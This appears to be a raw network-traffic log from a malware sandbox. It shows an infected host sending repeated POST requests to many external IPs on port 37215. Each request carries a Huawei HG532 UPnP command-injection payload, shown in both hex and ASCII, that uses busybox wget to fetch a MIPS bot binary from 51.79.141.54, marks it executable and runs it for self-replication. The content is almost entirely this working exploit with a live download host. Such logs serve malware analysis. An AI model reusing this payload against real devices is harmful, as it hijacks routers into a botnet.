                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    132192.168.2.1458662197.249.140.5537215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.501688004 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    133192.168.2.145132041.149.109.19737215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.506757975 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    134192.168.2.145165241.211.47.1037215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.506757975 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    135192.168.2.143907261.176.198.12137215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.512949944 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    136192.168.2.1453088197.254.13.13437215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.512949944 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    137192.168.2.145038041.36.60.19637215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.513425112 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    138192.168.2.145676018.58.222.6037215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.515883923 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    139192.168.2.1458418115.126.63.25537215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.522835970 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    140192.168.2.1447786157.242.244.13637215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.522835970 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    141192.168.2.143306241.65.39.22337215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.524636984 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
